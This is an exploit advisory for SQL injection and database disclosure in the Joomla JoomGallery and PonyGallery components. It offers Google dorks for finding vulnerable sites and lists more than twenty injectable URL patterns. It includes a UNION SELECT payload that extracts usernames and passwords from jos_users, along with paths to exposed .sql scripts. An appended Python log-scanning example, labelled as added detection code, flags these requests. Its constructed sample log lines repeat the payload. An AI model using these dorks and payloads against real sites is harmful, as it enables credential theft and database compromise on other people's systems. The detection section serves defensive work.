KingSkrupellos

Joomla JoomGallery 3.2.2 PonyGallery 2.5.1 SQL Inj DB Disc

Feb 11th, 2019
####################################################################

# Exploit Title : Joomla JoomGallery 3.2.2 PonyGallery 2.5.1 SQL Injection / Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 12/02/2019
# Vendor Homepage : joomlander.net - joomlacode.org
# Software Download Link : github.com/JoomGallery/JoomGallery/archive/master.zip
adyawinsa.com/index.php/remository?func=fileinfo&id=2
github.com/JoomGallery/JoomGallery
# Software Information Link : en.joomgallery.net/faq/general-faq/migration-and-update-to-joomgallery-15.html
en.joomgallery.net/demo/faq/general-faq/from-ponygallery-ml-in-joomla-1-5-89.html
extensions.joomla.org/extension/photos-a-images/galleries/joomgallery/
sourceforge.net/projects/pony-gallery/
joomlacode.org/gf/project/ponygalleryrand/
# Software Affected Versions : 3.3.0 3.2.2 for Joomla 3.x and previous versions.
+ PonyGallery 2.5.1 ML for Joomla 1.5 - PonyGallery v1.0.x extension
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/index.php?option=com_ponygallery''
inurl:''/index.php?option=com_joomgallery''
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-200 [ Information Exposure ]
# Old Similar CVE [ Only Version and Parameters are different ] : CVE-2007-4046
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description about Software :
***************************
JoomGallery is a gallery component completely integrated into Joomla!, with support for Joomla! 3.x

Pony Gallery is a module that displays one or more random Pony Gallery images, as sizable thumbnails or full-size, in horizontal or vertical orientation, with optional category and author links.

This Joomla extension/component moved to JoomlaCode.org on 12/12/2007 from Joomlander.Net.

Now JoomGallery and PonyGallery are presented together.

####################################################################

# Impact :
***********
* The Joomla JoomGallery 3.2.2 / PonyGallery 3.2.2 component (and other versions) is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

A remote attacker can send a specially crafted request to the vulnerable application and execute arbitrary SQL commands in the application's database. Further exploitation of this vulnerability may result in unauthorized data manipulation. An attacker can exploit this issue using a browser.

* This software is also prone to an information exposure / database disclosure vulnerability. Successful exploits of this issue may allow an attacker to obtain sensitive information by downloading the full contents of the application's database.

* Any remote user may download the database files and gain access to sensitive information including unencrypted authentication credentials.

####################################################################

# SQL Injection Exploit :
**********************
/index.php?option=com_ponygallery&Itemid=[SQL Injection]
/index.php?option=com_ponygallery&Itemid=[SQL Injection]&func=special
/index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=[SQL Injection]
/index.php?option=com_ponygallery&Itemid=[ID-NUMBER]&func=detail&id=[SQL Injection]
/index.php?option=com_ponygallery&Itemid=[ID-NUMBER]&func=viewcategory&catid=[SQL Injection]&lang=dutch
/index.php?option=com_ponygallery&Itemid=[ID-NUMBER]&func=viewcategory&catid=[ID-NUMBER]&startpage=[SQL Injection]
/index.php?option=com_ponygallery&Itemid=[ID-NUMBER]&func=special&sorting=lastcomment&date=[YEAR]-[MONTH]-[DAY][SQL Injection]
/index.php?option=com_joomgallery&func=viewcategory&catid=[ID-NUMBER]&startpage=[ID-NUMBER]&substartpage=[ID-NUMBER]&Itemid=[SQL Injection]&lang=en
/index.php?option=com_joomgallery&Itemid=[SQL Injection]
/index.php?view=detail&id=[SQL Injection]&option=com_joomgallery
/index.php?format=feed&type=rss&option=com_joomgallery&Itemid=[SQL Injection]
/index.php?option=com_joomgallery&func=viewcategory&catid=[ID-NUMBER]&Itemid=[SQL Injection]
/index.php?view=image&format=raw&type=orig&id=[ID-NUMBER]&option=com_joomgallery&Itemid=[SQL Injection]
/index.php?view=image&format=raw&type=img&id=[ID-NUMBER]&option=com_joomgallery&Itemid=[SQL Injection]
/index.php?view=detail&id=[ID-NUMBER]&option=com_joomgallery&lang=en&Itemid=[SQL Injection]
/index.php?view=category&catid=[ID-NUMBER]&option=com_joomgallery&Itemid=[ID-NUMBER]&page=[SQL Injection]
/index.php?option=com_joomgallery&func=download&catid=[ID-NUMBER]&id=[ID-NUMBER]&Itemid=[SQL Injection]&lang=ru
/index.php?option=com_joomgallery&catid=[ID-NUMBER]&lang=de&view=category&Itemid=[SQL Injection]&format=feed&type=atom
/index.php?view=category&catid=[ID-NUMBER]&page=[ID-NUMBER]&catpage=[ID-NUMBER]&option=com_joomgallery&Itemid=[SQL Injection]
/index.php?view=category&catid=[ID-NUMBER]&startpage=[ID-NUMBER]&substartpage=[ID-NUMBER]&option=com_joomgallery&Itemid=[SQL Injection]
/index.php?option=com_joomgallery&func=viewcategory&catid=[ID-NUMBER]&startpage=[ID-NUMBER]&substartpage=[ID-NUMBER]&Itemid=[SQL Injection]&lang=en#subcategory

# Example SQL Injection Exploit Payload :
*************************************
%20union%20select%201,2,3,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),5,0,0%20from%20jos_users/*

# Database Disclosure Exploit :
***************************
/administrator/components/com_joomgallery/sql/install.mysql.utf8.sql
/administrator/components/com_joomgallery/sql/uninstall.mysql.utf8.sql
/administrator/components/com_joomgallery/sql/updates/mysql/2.0.0.sql
/administrator/components/com_joomgallery/sql/updates/mysql/2.1.0.sql
/administrator/components/com_joomgallery/sql/updates/mysql/3.0.0.sql
/administrator/components/com_joomgallery/sql/updates/mysql/3.1.0.sql
/administrator/components/com_joomgallery/sql/updates/mysql/3.2.0.sql
/administrator/components/com_joomgallery/sql/updates/mysql/3.2.1.sql
/administrator/components/com_joomgallery/sql/updates/mysql/3.3.0.sql

####################################################################

# Example Vulnerable Sites :
*************************
####################################################################

# Example SQL Database Error :
****************************
Deprecated: Assigning the return value of new by reference is
deprecated in /home/users/puhelf/public_html/includes/joomla.php on line 829

Deprecated: Non-static method JSite::getMenu() should not be called statically,
assuming $this from incompatible context in /home/doggymon/public_html
/NJBalloon.com/components/com_joomgallery/views/detail/view.html.php on line 60

No valid database connection You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the
right syntax to use near '-8,8' at line 17 SQL=SELECT *, a.owner AS owner,
ROUND(imgvotesum/imgvotes, 2) AS rating FROM jos_joomgallery AS
a LEFT JOIN jos_joomgallery_catg AS c ON c.cid=a.catid WHERE
a.published = '1' AND a.catid = '113' AND a.approved = '1' AND
c.access <= '0' ORDER BY a.imgdate ASC, a.imgdate ASC,
a.imgdate ASC LIMIT -8,8
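
The injection URLs, the disclosed .sql paths and the LIMIT -8,8 error above all leave a recognisable trace in web server access logs. The following Python is an added detection example written for this page, not code from the advisory or from the JoomGallery project: it parses combined-format access log lines and flags gallery requests whose integer parameters (Itemid, catid, id, startpage, substartpage, page, catpage) are not plain digits, date values that are not YYYY-MM-DD, fetches of the component's install/update SQL scripts, and query strings carrying UNION/comment markers. The log lines and client addresses are constructed samples.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote

# Components and parameters named as injection points in the advisory above.
GALLERY_COMPONENTS = {"com_joomgallery", "com_ponygallery"}
INT_PARAMS = ("Itemid", "catid", "id", "startpage", "substartpage", "page", "catpage")
DATE_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")                  # the &date= parameter
SQL_DIR = "/administrator/components/com_joomgallery/sql/"   # disclosed .sql scripts
SQLI_MARKERS = re.compile(r"union\s+select|concat\(|/\*|\bfrom\s+\w*users\b", re.I)
# Combined-format access log: client, request target and status are all we need.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify_request(target):
    """Return the findings for one request target (path plus query string)."""
    findings = []
    parsed = urlparse(target)
    path = unquote(parsed.path)
    if path.startswith(SQL_DIR) and path.endswith(".sql"):
        findings.append("sql-script-disclosure:" + path)
    query = parse_qs(parsed.query, keep_blank_values=True)  # parse_qs decodes %27 -> '
    if query.get("option", [""])[0] in GALLERY_COMPONENTS:
        for name in INT_PARAMS:
            for value in query.get(name, []):
                if not value.isdigit():   # rejects 5', -8 and appended UNION payloads alike
                    findings.append(f"non-numeric {name}={value}")
        for value in query.get("date", []):
            if not DATE_RE.match(value):
                findings.append(f"malformed date={value}")
    if SQLI_MARKERS.search(unquote(parsed.query)):
        findings.append("sqli-marker")
    return findings

def scan_log(lines):
    """Return (client_ip, status, findings) for every log line that matches a pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            findings = classify_request(m.group("target"))
            if findings:
                hits.append((m.group("ip"), int(m.group("status")), findings))
    return hits

# Constructed sample log lines (not captured from any real site).
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Feb/2019:10:01:02 +0000] "GET /index.php?option=com_joomgallery&func=viewcategory&catid=113&startpage=1&substartpage=3&Itemid=5%27&lang=en HTTP/1.1" 500 512',
    '203.0.113.7 - - [11/Feb/2019:10:01:09 +0000] "GET /index.php?option=com_ponygallery&Itemid=38%20union%20select%201,2,3,concat(username,password),5,0,0%20from%20jos_users/* HTTP/1.1" 200 2048',
    '203.0.113.7 - - [11/Feb/2019:10:01:15 +0000] "GET /administrator/components/com_joomgallery/sql/install.mysql.utf8.sql HTTP/1.1" 200 9120',
    '198.51.100.4 - - [11/Feb/2019:10:02:00 +0000] "GET /index.php?option=com_joomgallery&view=category&catid=7&Itemid=112 HTTP/1.1" 200 4096',
]
```

A 500 response paired with a non-numeric Itemid is the server-side counterpart of the SQL syntax error quoted above, so those hits deserve the highest priority. Denying web access to the sql/ directory at the web server is the matching mitigation for the disclosure paths.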

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################